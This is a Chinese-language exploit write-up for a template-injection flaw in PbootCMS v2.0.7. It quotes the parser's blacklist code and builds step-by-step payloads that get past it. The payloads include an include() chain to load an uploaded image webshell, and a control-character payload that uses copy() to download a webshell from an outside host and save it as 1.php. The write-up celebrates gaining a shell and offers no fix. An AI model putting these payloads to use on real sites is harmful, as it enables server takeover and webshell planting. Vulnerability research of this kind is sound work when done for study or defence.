PbootCMS v2.0.7 模板注入¶
一、漏洞简介¶
二、漏洞影响¶
PbootCMS v2.0.7
三、复现过程¶
漏洞分析
文件:apps/home/controller/ParserController.php
精简后的代码如下:
<?php
public function parserIfLabel($content){
$pattern = '/\{pboot:if\(([^}^\$]+)\)\}([\s\S]*?)\{\/pboot:if\}/';
if (preg_match_all($pattern, $content, $matches)) {
$count = count($matches[0]);
for ($i = 0; $i < $count; $i ++) {
$danger = false;
// 带有函数的条件语句进行安全校验
if (preg_match_all('/([\w]+)([\\\s]+)?\(/i', $matches[1][$i], $matches2)) {
foreach ($matches2[1] as $value) {
if (function_exists($value)){
$danger = true;
break;
}
}
}
// 过滤特殊字符串
if (preg_match('/(\$_GET\[)|(\$_POST\[)|(\$_REQUEST\[)|(\$_COOKIE\[)|(\$_SESSION\[)|(file_put_contents)|(fwrite)|(phpinfo)|(base64_decode)|(`)|(shell_exec)|(eval)|(system)|(exec)|(passthru)/i', $matches[1][$i])) {
$danger = true;
}
// 如果有危险函数,则不解析该IF
if ($danger) {
continue;
}
eval('if(' . $matches[1][$i] . '){$flag="if";}else{$flag="else";}');
...
?>
这里大概的意思就是,在模板的if语句中,通过正则找到函数的结构,然后将其传入function_exists,如果该函数存在则不执行下面的eval()
如果可以编辑模板文件,或者存在模板注入的话,那么就可以尝试绕一下这些限制,看能不能往eval()
里面注入代码。
在后台翻了一下,没有看到有对模板文件进行修改的地方,所以考虑模板注入。
在后台的公司信息栏目插入符合模板if语句的
Payload:
{pboot:if(1)}OK{/pboot:if}
可以看到这里的模板语句已经解析了。所以这里是存在模板注入的。
但是这个程序是有对所有参数进行全局的htmlspecialchars和addslashes的,在结合上面的正则,导致我们不能使用很多字符。
有:'"$}和反引号、\x00
等等。
根据这个限制我很快有了一种思路:
php的语法有一些具有函数结构,但是却不是函数的关键字。
例如:include()、array()等。
现在思路就很明确了,既然 include()可以绕过函数检测这个点,那么往里面传参数就完事了。
接下来就是要想办法在当前限制下构造出一个字符串往include()里面传了。
思路1:
通过$_SERVER
数组传,但是前面的正则ban了$
,所以这个思路不行。
思路2:
使用get_defined_vars()从get的参数里面获取,但是get_defined_vars不能过function_exists,所以也不行。
思路3:
PHP7.2版本开始:不带引号的字符串是不存在的全局常量的话,那么则转化成他们自身的字符串。
意思就是echo a=>define(a, 'a');echo a;
那么就可以不使用引号,从而构造字符串了。
所以我们可以在后台上传一个图片马,然后用include()去包含getshell了。
但是这里有个问题,上传后的图片路径会有数字和/、.,而数字和/、.不带引号是不会触发上面说的trick的。
也就是现在能构造任意字母了,但是还需要数字和/、.
/和.其实很好办,PHP有几个预定义常量如__FILE__,获取当前的文件的绝对路径
在程序里打印一下看看
.和/都有,但是直接用数组的方式去取是会报错的。
这时候就需要用到刚刚说的array()了,将__FILE__放进array()里之后再利用去二维数组的方式去取就不会报错了。(因为这里是将常量赋值进了数组里面,不是直接对常量进行数组的方式取值,所以不会报错。)
var_dump(array(__FILE__)[0][-4]); //=.
var_dump(array(__FILE__)[0][-21]); //=/
现在就缺数字了,而且该数字还必须是String型的数字。
PHP下还有带有数字的常量,例如__LINE__、PHP_VERSION,但是这些数字可能不太够,而且也不太能确定具体得值,不够"一般化"。
于是开始寻找别的办法。
于是我开始全局搜索define(,寻找在程序中定义的,可控或者含有数字的常量。
文件:core/view/Paging.php
<?php
...
public function limit($total = null, $morePageStr = false){
// 起始数据调整
if (! is_numeric($this->start) || $this->start < 1) {
$this->start = 1;
}
if ($this->start > $total) {
$this->start = $total + 1;
}
// 设置总数
if ($total) {
$this->rowTotal = $total - ($this->start - 1);
}
// 设置分页大小
if (! isset($this->pageSize)) {
$this->pageSize = get('pagesize') ?: Config::get('pagesize') ?: 15;
}
// 分页数字条数量
$this->num = Config::get('pagenum') ?: 5;
// 计算页数
$this->pageCount = @ceil($this->rowTotal / $this->pageSize);
// 获取当前页面
$this->page = $this->page();
// 定义相关常量,用于方便模板引擎解析序号等计算和调用
define('ROWTOTAL', $this->rowTotal);
define('PAGECOUNT', $this->pageCount);
define('PAGE', $this->page);
define('PAGESIZE', $this->pageSize);
// 注入分页模板变量
$this->assign($morePageStr);
// 返回限制语句
return ($this->page - 1) * $this->pageSize + ($this->start - 1) . ",$this->pageSize";
}
// 当前页码容错处理
private function page(){
$page = get('page', 'int') ?: $this->page;
if (is_numeric($page) && $page > 1) {
if ($page > $this->pageCount && $this->pageCount) {
return $this->pageCount;
} else {
return $page;
}
} else {
return 1;
}
}
...
?>
这里是该程序的一个分页类,可以看到里面有一个叫PAGE的常量,且该常量可控。
那么就寻找调用了这个分页类的地方传入page就好。
例如:http://url/?keyword=123&page=0123456789
且该常量为string类型。
至此,路径中需要的字符都构造出来了,只需要用.连接即可。
漏洞复现¶
上传图片马
得到路径static/upload/image/20200417/1587111957160139.png
根据路径构造payload
include(s.tatic.array(__FILE__)[0][0].upload.array(__FILE__)[0][0].image.array(__FILE__)[0][0].array(PAGE)[0][2].array(PAGE)[0][0].array(PAGE)[0][2].array(PAGE)[0][0].array(PAGE)[0][0].array(PAGE)[0][4].array(PAGE)[0][1].array(PAGE)[0][7].(马赛克).png)
将payload放入模板的if语句中
模板注入
访问带有分页类且又能输出公司地址的地方
Getshell成功!!!
补充
一开始在研究这个漏洞的时候,就觉得有点麻烦,又要上传图片马,又要构造图片马的路径,不能一个payload直接打,十分麻烦。
于是就跑去问了问P师傅**(P牛,永远滴神!)**
P师傅理解了我的需求后,直接甩了个payload给我
看到后我才想起,以前就看过P师傅的一篇文章里面的一个trick:在一个函数的括号前面加入一些控制字符,PHP一样能识别改函数并执行。利用这个trick就可以执行任意函数了。
于是根据P师傅给的思路再结合程序本身的一些其他的黑名单限制,很快我就构造出了一个通用的Payload
{pboot%3aif(copy%01(chr%01(104).chr%01(116).chr%01(116).(马赛克),chr%01(49).chr%01(46).chr%01(112).chr%01(104).chr%01(112)))}asdasdasd{/pboot%3aif}
利用一个copy()函数到远程服务器上下载一个webshell放在本地,这里的webshell地址通过chr()函数一个个还原出shell地址一个个拼接。
向模板注入该payload:
访问前台触发点:
则会去http://mock.x.dnshia.cn/shell
下载webshell,并保存到1.php